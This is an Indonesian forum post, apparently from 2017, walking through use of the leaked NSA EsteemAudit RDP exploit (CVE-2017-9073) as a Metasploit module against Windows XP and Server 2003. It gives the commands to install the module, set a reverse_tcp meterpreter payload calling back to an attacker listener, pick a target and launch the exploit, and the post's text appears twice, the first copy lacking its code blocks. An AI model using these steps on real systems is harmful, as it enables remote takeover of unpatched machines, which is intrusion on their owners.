06-11-2017, 12:03 PM
Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP.
![[Image: Untitled-1.png]](https://4.bp.blogspot.com/-xSJ8SJO1SUg/WTscSmpwYSI/AAAAAAAABI0/6lpOVAel128GiFgovr0iisD9oKU6yUVdACK4B/s1600/Untitled-1.png)
Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit
1. Download & ekstrak file yang dibutuhkan
Source : Esteemaudit-Metasploit
Atau clone langsung seperti berikut
2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.
3. Buka msfconsole dan mulai exploitasi dengan EsteemAudit
Jika target/korban adalah 64bit maka :
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set TARGETARCHITECTURE x86 64-bit
Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut
Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.
Jika sukses akan terbuka sesi meterpreter seperti berikut.
Bonus Video :
NOTES :
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.
Oke sekian pos nya, semoga bermanfaat. Terimakasih.
![[Image: Untitled-1.png]](https://4.bp.blogspot.com/-xSJ8SJO1SUg/WTscSmpwYSI/AAAAAAAABI0/6lpOVAel128GiFgovr0iisD9oKU6yUVdACK4B/s1600/Untitled-1.png)
Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit
1. Download & ekstrak file yang dibutuhkan
Source : Esteemaudit-Metasploit
Atau clone langsung seperti berikut
Code:
root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git
root@attackermachine:~/tool# cd Esteemaudit-Metasploit/
root@attackermachine:~/tool/Esteemaudit-Metasploit# ls -l
2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.
Code:
root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp
root@attackermachine:~/tool/Esteemaudit-Metasploit# cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/
root@attackermachine:~/tool/Esteemaudit-Metasploit# cd files/
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# mkdir /usr/share/esteemaudit
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# cp * /usr/share/esteemaudit/
3. Buka msfconsole dan mulai exploitasi dengan EsteemAudit
Code:
msf > use exploit/windows/rdp/esteemaudit
msf exploit(esteemaudit) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(esteemaudit) > set LHOST IP_LISTENER_ATTACKER
msf exploit(esteemaudit) > set LPORT PORT_LISTERNER_ATTACKER
msf exploit(esteemaudit) > set TARGETARCHITECTURE x86
Jika target/korban adalah 64bit maka :
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set TARGETARCHITECTURE x86 64-bit
Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut
Code:
msf exploit(esteemaudit) > show targets
![[Image: Lp-lKatrRRWov39DR-Ykww.png]](https://image.prntscr.com/image/Lp-lKatrRRWov39DR-Ykww.png)
Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.
Code:
msf exploit(esteemaudit) > set TARGET 4
msf exploit(esteemaudit) > exploit
Jika sukses akan terbuka sesi meterpreter seperti berikut.
![[Image: aIkCQ0tqRV2IE2LSpSZMog.png]](https://image.prntscr.com/image/aIkCQ0tqRV2IE2LSpSZMog.png)
Bonus Video :
NOTES :
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.
Oke sekian pos nya, semoga bermanfaat. Terimakasih.